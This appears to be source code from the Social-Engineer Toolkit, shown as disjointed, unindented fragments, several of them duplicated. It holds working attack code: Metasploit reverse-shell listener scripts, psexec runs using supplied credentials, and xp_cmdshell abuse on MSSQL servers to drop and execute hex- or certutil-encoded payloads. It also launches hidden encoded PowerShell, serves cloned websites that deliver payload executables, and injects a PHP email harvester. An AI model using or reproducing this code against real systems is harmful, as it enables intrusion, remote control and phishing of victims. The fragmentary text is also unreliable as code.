choice = core.yesno_prompt("0", "Do you want to start the listener now [yes/no]: ")
if choice == 'NO':
pass
# if we want to start the listener
if choice == 'YES':
with open(core.setdir + "/reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST 0.0.0.0\n"
"set ExitOnSession false\n"
"exploit -j".format(port))
msf_path = core.meta_path()
subprocess.Popen("{0} -r {1}".format(os.path.join(msf_path, "msfconsole"),
os.path.join(core.setdir, "reports/powershell/powershell.rc")),
shell=True).wait()
core.print_status("Powershell files can be found under {0}".format(os.path.join(core.setdir, "reports/powershell")))
core.return_continue()
# if we select powershell reverse shell
if powershell_menu_choice == "2":
# prompt for IP address and port
port = input(core.setprompt(["29"], "Enter the port for listener [443]"))
# default to 443
if not port:
port = "443"
#!/usr/bin/env python
try:
import readline
except:
pass
from src.core.setcore import bcolors, get_version, check_os, meta_path
# grab version of SET
define_version = get_version()
# check operating system
operating_system = check_os()
# grab metasploit path
msf_path = meta_path()
PORT_NOT_ZERO = "Port cannot be zero!"
PORT_TOO_HIGH = "Let's stick with the LOWER 65,535 ports..."
main_text = " Select from the menu:\n"
main_menu = ['Social-Engineering Attacks',
'Fast-Track Penetration Testing',
'Third Party Modules',
'Update the Metasploit Framework',
'Update the Social-Engineer Toolkit',
'Update SET configuration',
'Help, Credits, and About']
main = ['Spear-Phishing Attack Vectors',
'Website Attack Vectors',
payload = "windows/meterpreter/reverse_https\n" # if we are using x86
command = x86 # assign powershell to command
# write out our answer file for the powershell injection attack
with open(core.userconfigpath + "reports/powershell/powershell.rc", "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set LPORT {0}\n"
"set LHOST {1}\n"
"set EnableStageEncoding true\n"
"set ExitOnSession false\n"
"exploit -j\n"
"use auxiliary/admin/smb/psexec_command\n"
"set RHOSTS {2}\n"
"set SMBUser {3}\n"
"set SMBPass {4}\n"
"set SMBDomain {5}\n"
"set THREADS {6}\n"
"set COMMAND {7}\n"
"exploit\n".format(port, ipaddr, rhosts, username, password, domain, threads, command, stage_encoding))
# launch metasploit below
core.print_status("Launching Metasploit.. This may take a few seconds.")
subprocess.Popen("{0} -r {1}".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.userconfigpath, "reports/powershell/powershell.rc")),
shell=True).wait()
# handle exceptions
except Exception as e:
core.print_error("Something went wrong printing error: {0}".format(e))
if choice == "YES":
# Open the IPADDR file
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("LHOST IP address to connect back on: ")
core.update_options("IPADDR=" + ipaddr)
if core.check_options("PORT=") != 0:
port = core.check_options("PORT=")
else:
port = input("Enter the port to connect back on: ")
with open(os.path.join(core.setdir + "metasploit.answers"), "w") as filewrite:
filewrite.write("use multi/handler\n"
"set payload {0}\n"
"set LHOST {1}\n"
"set LPORT {2}\n"
"set AutoRunScript post/windows/manage/smart_migrate\n"
"exploit -j".format(payload, ipaddr, port))
print("[*] Launching Metasploit....")
try:
child = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "metasploit.answers")))
child.interact()
except:
pass
def web_server_start():
# define if use apache or not
apache = False
# open set_config here
apache_check = core.check_config("APACHE_SERVER=").lower()
if apache_check == "on" or track_email == "on":
apache_path = core.check_config("APACHE_DIRECTORY=")
if os.path.isdir(os.path.join(apache_path, "html")):
os.path.join(apache_path, "html")
apache = True
if operating_system == "windows":
apache = False
# specify the web port
web_port = core.check_config("WEB_PORT=")
# see if exploit requires webdav
if os.path.isfile(os.path.join(core.setdir, "meta_config")):
with open(os.path.join(core.setdir, "meta_config")) as fileopen:
for line in fileopen:
line = line.rstrip()
match = re.search("set SRVPORT 80", line)
if match:
match2 = re.search("set SRVPORT 8080", line)
if not match2:
web_port = 8080
# check ip address
if core.check_options("IPADDR=") != 0:
ipaddr = core.check_options("IPADDR=")
else:
ipaddr = input("Enter your ip address: ")
# unless we create template do self
template = "SELF"
# Grab custom or set defined
if os.path.isfile(os.path.join(core.setdir, "site.template")):
with open(core.setdir, "site.template") as fileopen:
for line in fileopen:
line = line.rstrip()
template_match = re.search("TEMPLATE=", line)
url_match = re.search("URL=", line)
if url_match:
# define url to clone here
url = line.split("=")[1].rstrip()
if template_match:
template = line.split("=")[1]
# if attach vector isn't set just set a default template
attack_vector = "nada"
# grab web attack selection
if os.path.isfile(os.path.join(core.setdir, "attack_vector")):
with open(os.path.join(core.setdir, "attack_vector")) as fileopen:
for line in fileopen:
attack_vector = line.rstrip()
# Sticking it to A/V below
rand_gen = random_string()
# check multiattack flags here
multiattack_harv = "off"
if os.path.isfile(os.path.join(core.setdir, "multi_harvester")):
multiattack_harv = "on"
if os.path.isfile(os.path.join(core.setdir, "/multi_tabnabbing")):
multiattack_harv = "on"
# If SET is setting up the website for you, get the website ready for
# delivery
if template == "SET":
# change to that directory
os.chdir("src/html/")
# remove stale index.html files
if os.path.isfile("index.html"):
os.remove("index.html")
# define files and get ipaddress set in index.html
if attack_vector == "java":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
match1 = re.search("msf.exe", line)
if match1:
line = line.replace("msf.exe", rand_gen)
match = re.search("ipaddrhere", line)
if match:
line = line.replace("ipaddrhere", ipaddr)
filewrite.write(line)
# move random generated name
shutil.copyfile("msf.exe", rand_gen)
# define browser attack vector here
if attack_vector == "browser":
with open("index.template") as fileopen, \
open("index.html", "w") as filewrite:
for line in fileopen:
counter = 0
match = re.search(applet_name, line)
if match:
line = line.replace(applet_name, "invalid.jar")
filewrite.write(line)
counter = 1
match2 = re.search("<head>", line)
if match2:
if web_port != 8080:
line = line.replace("<head>",
'<head><iframe src ="http://{0}:8080/" width="100" height="100" scrolling="no"></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if web_port == 8080:
line = line.replace(
"<head>", '<head><iframe src = "http://{0}:80/" width="100" height="100" scrolling="no" ></iframe>'.format(ipaddr))
filewrite.write(line)
counter = 1
if counter == 0:
filewrite.write(line)
if template == "CUSTOM" or template == "SELF":
# Bring our files to our directory
if attack_vector != 'hid' and attack_vector != 'hijacking':
print(core.bcolors.YELLOW + "[*] Moving payload into cloned website." + core.bcolors.ENDC)
# copy all the files needed
if not os.path.isfile(os.path.join(core.setdir, applet_name)):
shutil.copyfile(os.path.join(definepath, "src/html/Signed_Update.jar.orig"), os.path.join(core.setdir, applet_name))
shutil.copyfile(os.path.join(core.setdir, applet_name), os.path.join(core.setdir, "web_clone", applet_name))
if os.path.isfile(os.path.join(definepath, "src/html/nix.bin")):
nix = core.check_options("NIX.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/nix.bin"), os.path.join(core.setdir, "web_clone", nix))
if os.path.isfile(os.path.join(definepath, "src/html/mac.bin")):
mac = core.check_options("MAC.BIN=")
shutil.copyfile(os.path.join(definepath, "src/html/mac.bin"), os.path.join(core.setdir, "web_clone", mac))
if os.path.isfile(os.path.join(core.setdir, "msf.exe")):
win = core.check_options("MSF.EXE=")
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone", win))
# pull random name generation
core.print_status("The site has been moved. SET Web Server is now listening..")
rand_gen = core.check_options("MSF_EXE=")
if rand_gen:
if os.path.isfile(os.path.join(core.setdir, "custom.exe")):
shutil.copyfile(os.path.join(core.setdir, "msf.exe"), os.path.join(core.setdir, "web_clone/msf.exe"))
print("\n[*] Website has been cloned and custom payload imported. Have someone browse your site now")
shutil.copyfile(os.path.join(core.setdir, "web_clone/msf.exe"), os.path.join(core.setdir, "web_clone", rand_gen))
# if docbase exploit do some funky stuff to get it to work right
if os.path.isfile(os.path.join(core.setdir, "docbase.file")):
docbase = (r"""<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN"
"http://www.w3.org/TR/html4/frameset.dtd">
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="99%%, 1%%">
<FRAME src="site.html">
<FRAME name=docbase noresize borders=0 scrolling=no src="http://{0}:8080">
</FRAMESET>
</HTML>""".format(ipaddr))
if os.path.isfile(os.path.join(core.setdir, "web_clone/site.html")):
os.remove(os.path.join(core.setdir, "web_clone/site.html"))
shutil.copyfile(os.path.join(core.setdir, "web_clone/index.html"),
os.path.join(core.setdir, "web_clone/site.html"))
with open(core.setdir + "/web_clone/index.html", "w") as filewrite:
filewrite.write(docbase)
##########################################################################
#
# START WEB SERVER STUFF HERE
#
##########################################################################
if not apache:
if multiattack_harv == 'off':
try:
# specify port listener here
# specify the path for the SET web directories for the applet
# attack
path = os.path.join(core.setdir, "web_clone/")
try:
import src.core.webserver as webserver
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
thread.start_new_thread(webserver.start_server, (web_port, path))
# Handle KeyboardInterrupt
except KeyboardInterrupt:
core.exit_set()
# Handle Exceptions
except Exception as e:
core.log(e)
print("{0}[!] ERROR: You probably have something running on port 80 already, Apache??"
"[!] There was an issue, printing error: {1}{2}".format(core.bcolors.RED, e, core.bcolors.ENDC))
stop_apache = input("Attempt to stop Apache? y/n: ")
if stop_apache == "yes" or stop_apache == "y" or stop_apache == "":
subprocess.Popen("/etc/init.d/apache2 stop", shell=True).wait()
try:
# specify port listener here
import src.core.webserver as webserver
# specify the path for the SET web directories for the
# applet attack
path = os.path.join(core.setdir + "web_clone")
p = multiprocessing.Process(target=webserver.start_server, args=(web_port, path))
p.start()
except:
print("{0}[!] UNABLE TO STOP APACHE! Exiting...{1}".format(core.bcolors.RED, core.bcolors.ENDC))
sys.exit()
# if we are custom, put a pause here to not terminate thread on web
# server
if template == "CUSTOM" or template == "SELF":
custom_exe = core.check_options("CUSTOM_EXE=")
if custom_exe:
while True:
# try block inside of loop, if control-c detected, then
# exit
try:
core.print_warning("Note that if you are using a CUSTOM payload. YOU NEED TO CREATE A LISTENER!!!!!")
input("\n{0}[*] Web Server is listening. Press Control-C to exit.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
# handle keyboard interrupt
except KeyboardInterrupt:
print("{0}[*] Returning to main menu.{1}".format(core.bcolors.GREEN, core.bcolors.ENDC))
break
if apache:
subprocess.Popen("cp {0} {apache_path};"
"cp {1} {apache_path};"
"cp {2} {apache_path};"
"cp {3} {apache_path};"
"cp {4} {apache_path}".format(os.path.join(definepath, "src/html/*.bin"),
os.path.join(definepath, "src/html/*.html"),
os.path.join(core.setdir, "web_clone/*"),
os.path.join(core.setdir, "msf.exe"),
os.path.join(core.setdir, "*.jar"),
apache_path=apache_path),
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).wait()
# if we are tracking users
if track_email == "on":
now = datetime.datetime.today()
with open(os.path.join(apache_path, "harvester_{}.txt".format(now)), 'w') as filewrite:
filewrite.write("")
subprocess.Popen("chown www-data:www-data '{0}'".format(os.path.join(apache_path, "harvester_{}.txt".format(now))), shell=True).wait()
# here we specify if we are tracking users and such
with open(os.path.join(apache_path, "index.html")) as fileopen:
data = fileopen.read()
data = data.replace("<body>",
"<body>"
"<?php $file = 'harvester_{0}.txt'; $queryString = ''; foreach ($_GET as $key => $value) {{ $queryString .= $key . '=' . $value . '&';}}$query_string = base64_decode($queryString);file_put_contents($file, print_r(\"Email address recorded: \" . $query_string . \"\\n\", true), FILE_APPEND);?>\n"
"/* If you are just seeing plain text you need to install php5 for apache apt-get install libapache2-mod-php5 */".format(now))
with open(os.path.join(apache_path, "index.php"), "w") as filewrite:
filewrite.write(data)
core.print_status("All files have been copied to {}".format(apache_path))
##########################################################################
#
# END WEB SERVER STUFF HERE
#
##########################################################################
if operating_system != "windows":
# Grab metaspoit path
msf_path = core.meta_path()
def deploy_hex2binary(ipaddr,port,username,password,option):
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username, password)
setcore.print_status("Connection established with SQL Server...")
setcore.print_status("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
if operating_system == "posix":
web_path = ("src/program_junk")
subprocess.Popen("cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null", shell=True).wait()
subprocess.Popen("cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null", shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
if operating_system == "posix":
import pexpect
meta_path = setcore.meta_path()
setcore.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# random executable name
random_exe = setcore.generate_random_string(10,15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode("$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)" % (random_exe,random_exe))
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.print_status("Attempting to re-enable the xp_cmdshell stored procedure if disabled..")
# reconfigure the stored procedure and re-enable
try:
target_server.execute_query("EXEC master.dbo.sp_configure 'show advanced options', 1")
target_server.execute_query("RECONFIGURE")
target_server.execute_query("EXEC master.dbo.sp_configure 'xp_cmdshell', 1")
target_server.execute_query("RECONFIGURE")
except: pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.print_status("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10,15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.print_status("Deploying stager payload (hex): " + setcore.bcolors.BOLD + str(print_line) + setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" % (line,random_file))
setcore.print_status("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.print_status("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.print_status("Deploying payload to victim machine (hex): " + setcore.bcolors.BOLD + str(data) + setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" % (data, random_exe))
setcore.print_status("Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" % (random_file))
target_server.execute_query("xp_cmdshell '%s %s'" % (random_file, random_exe))
# clean up the old files
setcore.print_status("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.print_status("Spawning seperate child process for listener...")
try: shutil.copyfile("src/program_junk/web_clone/x", definepath)
except: pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
fileopen = file("%s/src/program_junk/port.options" % (definepath), "r")
port = fileopen.read().rstrip()
# if for some reason the port didnt get created we default to 443
if not os.path.isfile("%s/src/program_junk/port.options" % (definepath)): port = "443" # default 443
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
# now back
os.chdir("src/program_junk/web_clone/")
setcore.print_status("Pausing 10 seconds to let the system catch up...")
time.sleep(10)
setcore.print_status("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command,))
time.sleep(1)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command,))
# if pexpect doesnt exit right then it freaks out
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except: pass
except: pass
def deploy_hex2binary(ipaddr, port, username, password):
# base variable used to select payload option
option = None
choice1 = "1"
conn = _mssql.connect("{0}:{1}".format(ipaddr, port),
username,
password)
core.print_status("Enabling the xp_cmdshell stored procedure...")
try:
conn.execute_query("exec master.dbo.sp_configure 'show advanced options',1;"
"GO;"
"RECONFIGURE;"
"GO;"
"exec master.dbo.sp_configure 'xp_cmdshell', 1;"
"GO;"
"RECONFIGURE;"
"GO")
except:
pass
# just throw a simple command via powershell to get the output
try:
print("""Pick which deployment method to use. The first is PowerShell and should be used on any modern operating system. The second method will use the certutil method to convert a binary to a binary.\n""")
choice = input("Enter your choice:\n\n"
"1.) Use PowerShell Injection (recommended)\n"
"2.) Use Certutil binary conversion\n\n"
"Enter your choice [1]:")
if choice == "":
choice = "1"
if choice == "1":
core.print_status("Powershell injection was selected to deploy to the remote system (awesome).")
option_ps = input("Do you want to use powershell injection? [yes/no]:")
if option_ps.lower() == "" or option_ps == "y" or option_ps == "yes":
option = "1"
core.print_status("Powershell delivery selected. Boom!")
else:
option = "2"
# otherwise, fall back to the older version using debug conversion via hex
else:
core.print_status("Powershell not selected, using debug method.")
option = "2"
except Exception as err:
print(err)
payload_filename = None
# if we don't have powershell
if option == "2":
# give option to use msf or your own
core.print_status("You can either select to use a default "
"Metasploit payload here or import your "
"own in order to deliver to the system. "
"Note that if you select your own, you "
"will need to create your own listener "
"at the end in order to capture this.\n\n")
choice1 = input("1.) Use Metasploit (default)\n"
"2.) Select your own\n\n"
"Enter your choice[1]:")
if choice1 == "":
choice1 = "1"
if choice1 == "2":
attempts = 0
while attempts <= 2:
payload_filename = input("Enter the path to your file you want to deploy to the system (ex /root/blah.exe):")
if os.path.isfile(payload_filename):
break
else:
core.print_error("File not found! Try again.")
attempts += 1
else:
core.print_error("Computers are hard. Find the path and try again. Defaulting to Metasploit payload.")
choice1 = "1"
if choice1 == "1":
web_path = None
#prep_powershell_payload()
import src.core.payloadgen.create_payloads
# if we are using a SET interactive shell payload then we need to make
# the path under web_clone versus ~./set
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
web_path = os.path.join(core.setdir + "web_clone")
# then we are using metasploit
else:
if operating_system == "posix":
web_path = core.setdir
# if it isn't there yet
if not os.path.isfile(core.setdir + "1msf.exe"):
# move it then
subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
(core.setdir, core.setdir), shell=True).wait()
payload_filename = os.path.join(web_path + "1msf.exe")
with open(payload_filename, "rb") as fileopen:
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
with open(os.path.join(core.setdir + "payload.hex"), "w") as filewrite:
filewrite.write(data)
if choice1 == "1":
# if we are using metasploit, start the listener
if not os.path.isfile(os.path.join(core.setdir + "set.payload")):
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
msf_path = core.meta_path()
child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
os.path.join(core.setdir + "meta_config")))
# random executable name
random_exe = core.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
core.print_status("Using universal powershell x86 process downgrade attack..")
payload = "x86"
# specify ipaddress of reverse listener
ipaddr = core.grab_ipaddress()
core.update_options("IPADDR=" + ipaddr)
port = input(core.setprompt(["29"], "Enter the port for the reverse [443]"))
if not port:
port = "443"
core.update_options("PORT={0}".format(port))
core.update_options("POWERSHELL_SOLO=ON")
core.print_status("Prepping the payload for delivery and injecting alphanumeric shellcode...")
#with open(os.path.join(core.setdir + "/payload_options.shellcode"), "w") as filewrite:
# format needed for shellcode generation
filewrite = file(core.setdir + "/payload_options.shellcode", "w")
filewrite.write("windows/meterpreter/reverse_https {0},".format(port))
filewrite.close()
try:
core.module_reload(src.payloads.powershell.prep)
except:
import src.payloads.powershell.prep
# launch powershell
#prep_powershell_payload()
# create the directory if it does not exist
if not os.path.isdir(os.path.join(core.setdir + "reports/powershell")):
os.makedirs(os.path.join(core.setdir + "reports/powershell"))
#with open(os.path.join(core.setdir + "x86.powershell")) as x86:
x86 = file(core.setdir + "x86.powershell").read().rstrip()
# x86 = x86.read()
x86 = "powershell -nop -window hidden -noni -e {0}".format(x86)
core.print_status("If you want the powershell commands and attack, "
"they are exported to {0}".format(os.path.join(core.setdir + "reports/powershell")))
filewrite = open(core.setdir + "/reports/powershell/x86_powershell_injection.txt", "w")
filewrite.write(x86)
filewrite.close()
# if our payload is x86 based - need to prep msfconsole rc
if payload == "x86":
powershell_command = x86
# powershell_dir = core.setdir + "/reports/powershell/x86_powershell_injection.txt"
#with open(os.path.join(core.setdir + "reports/powershell/powershell.rc"), "w") as filewrite:
filewrite = open(core.setdir + "reports/powershell/powershell.rc", "w")
filewrite.write("use multi/handler\n"
"set payload windows/meterpreter/reverse_https\n"
"set lport {0}\n"
"set LHOST 0.0.0.0\n"
"exploit -j".format(port))
filewrite.close()
else:
powershell_command = None
# grab the metasploit path from config or smart detection
msf_path = core.meta_path()
if operating_system == "posix":
try:
core.module_reload(pexpect)
except:
import pexpect
core.print_status("Starting the Metasploit listener...")
child2 = pexpect.spawn("{0} -r {1}".format(os.path.join(msf_path + "msfconsole"),
os.path.join(core.setdir + "reports/powershell/powershell.rc")))
core.print_status("Waiting for the listener to start first before we continue forward...")
core.print_status("Be patient, Metasploit takes a little bit to start...")
#child2.expect("Starting the payload handler", timeout=30000)
child2.expect("Processing", timeout=30000)
core.print_status("Metasploit started... Waiting a couple more seconds for listener to activate..")
time.sleep(5)
# assign random_exe command to the powershell command
random_exe = powershell_command
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
# here we start the conversion and execute the payload
core.print_status("Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
#with open(os.path.join(core.setdir + 'payload.hex'), 'r') as fileopen:
fileopen = open(core.setdir + 'payload.hex', "r")
core.print_status("Dropping initial begin certificate header...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----BEGIN CERTIFICATE----- > {0}.crt'".format(random_exe))
while fileopen:
data = fileopen.read(900).rstrip()
#for data in fileopen.read(900).rstrip():
if data == "":
break
core.print_status("Deploying payload to victim machine (hex): {bold}{data}{endc}\n".format(bold=core.bcolors.BOLD,
data=data,
endc=core.bcolors.ENDC))
conn.execute_query("exec master..xp_cmdshell 'echo {data} >> {exe}.crt'".format(data=data,
exe=random_exe))
core.print_status("Delivery complete. Converting hex back to binary format.")
core.print_status("Dropping end header for binary format conversion...")
conn.execute_query("exec master ..xp_cmdshell 'echo -----END CERTIFICATE----- >> {0}.crt'".format(random_exe))
core.print_status("Converting hex binary back to hex using certutil - Matthew Graeber man crush enabled.")
conn.execute_query("exec master..xp_cmdshell 'certutil -decode {0}.crt {0}.exe'".format(random_exe))
core.print_status("Executing the payload - magic has happened and now its time for that moment.. "
"You know. When you celebrate. Salute to you ninja - you deserve it.")
conn.execute_query("exec master..xp_cmdshell '{0}.exe'".format(random_exe))
# if we are using SET payload
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
core.print_status("Spawning separate child process for listener...")
try:
shutil.copyfile(os.path.join(core.setdir + "web_clone/x"), definepath)
except:
pass
# start a threaded webserver in the background
subprocess.Popen("python src/html/fasttrack_http_server.py", shell=True)
# grab the port options
# if core.check_options("PORT=") != 0:
# port = core.heck_options("PORT=")
#
# # if for some reason the port didnt get created we default to 443
# else:
# port = "443"
# thread is needed here due to the connect not always terminating thread,
# it hangs if thread isnt specified
try:
core.module_reload(thread)
except:
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
core.print_status("Triggering the powershell injection payload... ")
sql_command = ("exec master..xp_cmdshell '{0}'".format(powershell_command))
thread.start_new_thread(conn.execute_query, (sql_command,))
# using the old method
if option == "2":
core.print_status("Triggering payload stager...")
alphainject = ""
if os.path.isfile(os.path.join(core.setdir + "meterpreter.alpha")):
with open(os.path.join(core.setdir + "meterpreter.alpha")) as fileopen:
alphainject = fileopen.read()
sql_command = ("xp_cmdshell '{0}.exe {1}'".format(random_exe, alphainject))
# start thread of SQL command that executes payload
thread.start_new_thread(conn.execute_query, (sql_command,))
time.sleep(1)
# if pexpect doesnt exit right then it freaks out
if choice1 == "1":
if os.path.isfile(os.path.join(core.setdir + "set.payload")):
os.system("python ../../payloads/set_payloads/listener.py")
try:
# interact with the child process through pexpect
child2.interact()
try:
os.remove("x")
except:
pass
except:
pass
def deploy_hex2binary(ipaddr, port, username, password, option):
# connect to SQL server
target_server = _mssql.connect(ipaddr + ":" + str(port), username,
password)
setcore.PrintStatus("Connection established with SQL Server...")
setcore.PrintStatus("Converting payload to hexadecimal...")
# if we are using a SET interactive shell payload then we need to make the path under web_clone versus program_junk
if os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk/web_clone/")
# then we are using metasploit
if not os.path.isfile("src/program_junk/set.payload"):
web_path = ("src/program_junk")
subprocess.Popen(
"cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null",
shell=True).wait()
subprocess.Popen(
"cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null",
shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
meta_path = setcore.meta_path()
setcore.PrintStatus("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# random executable name
random_exe = setcore.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode(
"$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)"
% (random_exe, random_exe))
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.PrintStatus(
"Attempting to re-enable the xp_cmdshell stored procedure if disabled.."
)
# reconfigure the stored procedure and re-enable
try:
target_server.execute_query(
"EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
)
# need to do it a second time for some reason on 2005
target_server.execute_query("RECONFIGURE;")
except:
pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.PrintStatus("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.PrintStatus("Deploying stager payload (hex): " +
setcore.bcolors.BOLD + str(print_line) +
